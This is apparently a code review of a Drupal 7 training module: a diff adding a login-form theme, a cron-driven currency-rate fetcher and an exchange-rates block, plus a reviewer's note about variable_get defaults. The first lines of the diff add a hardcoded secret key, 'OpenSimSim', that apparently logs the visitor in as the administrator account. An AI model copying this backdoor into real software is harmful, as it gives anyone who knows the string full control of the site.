training/training.module

```diff
@@ -0,0 +1,510 @@
+  if ($form_state['values']['secret_key'] == 'OpenSimSim') {
+    user_load(1);
+    user_login_finalize($form_state);
+  }
+}
+
+/**
+ * Implements hook_theme().
+ */
+function training_theme() {
+  $theme = array();
+  $theme['test_form_theme_function'] = array(
+    'render element' => 'form',
+    'arguments' => array('form' => NULL),
+  );
+
+  return $theme;
+}
+
+/**
+ * Theming a custom layout for user_login_block.
+ *
+ * @param array $form
+ *   Array of form elements.
+ *
+ * @return string
+ *  String contents HTML tags for custom layout.
+ */
+function theme_test_form_theme_function($form) {
+  $attributes = array(
+    'id' => 'table-test-login',
+  );
+  $rows = array(
+    array(
+      drupal_render($form['form']['name']),
+    ),
+    array(
+      drupal_render($form['form']['pass']),
+    ),
+    array(
+      drupal_render($form['form']['secret_key']),
+    ),
+    array(
+      drupal_render($form['form']['actions']['submit']),
+    ),
+    array(
+      drupal_render($form['form']['links']) .
+      drupal_render($form['form']['form_build_id']) .
+      drupal_render($form['form']['form_id']),
+    ),
+  );
+
+  return theme('table', array(
+    'rows' => $rows,
+    'attributes' => $attributes,
+  ));
+}
+
+/**
+ * Sends a request to the rates service.
+ *
+ * Parses the xml data. Converts xml object properties to string,
+ * writes them to arrays. The resulting arrays sets in the variables:
+ * $training_data_rates_service, $training_date_update_rates_service.
+ */
+function _training_request_rates_service() {
+  $date = '';
+  $array = array();
+  $request = drupal_http_request(TRAINING_BLOCK_RATES_SERVICE);
+  $data = new SimpleXMLElement($request->data);
+  foreach ($data->Currency as $value) {
+    $array[] = array(
+      'CharCode' => (string) $value->CharCode,
+      'Name' => (string) $value->Name,
+      'Rate' => (string) $value->Rate,
+    );
+  }
+  foreach ($data->attributes() as $key => $val) {
+    $date .= (string) $val;
+  }
+  variable_set('training_data_rates_service', $array);
+  variable_set('training_date_update_rates_service', $date);
+}
+
+/**
+ * Implements hook_cron().
+ *
+ * Calls custom function _training_request_rates_service().
+ *
+ * @see _training_request_rates_service()
+ */
+function training_cron() {
+  $default = time();
+  $last_crone = variable_get('last_start', $default);
+  //sets the start-up period (15 min).
+  if ($default-$last_crone >= 900) {
+    variable_set('last_start', time());
+    _training_request_rates_service();
+  }
+}
+
+/**
+ * Implements hook_block_info().
+ */
+function training_block_info() {
+  $blocks['exchange'] = array(
+    'info' => t('Exchange'),
+    'cache' => DRUPAL_CACHE_GLOBAL,
+  );
+
+  return $blocks;
+}
+
+/**
+ * Implements hook_block_view().
+ */
+function training_block_view($delta='') {
+  $date = variable_get('training_date_update_rates_service');
+  $data = variable_get('training_data_rates_service');
```

Comment:
always specify default value for variable_get

otherwise if variable_set fails your loop below will be transformed to 

foreach (NULL as $value) {

}

and you will see Warning: Invalid argument supplied for foreach()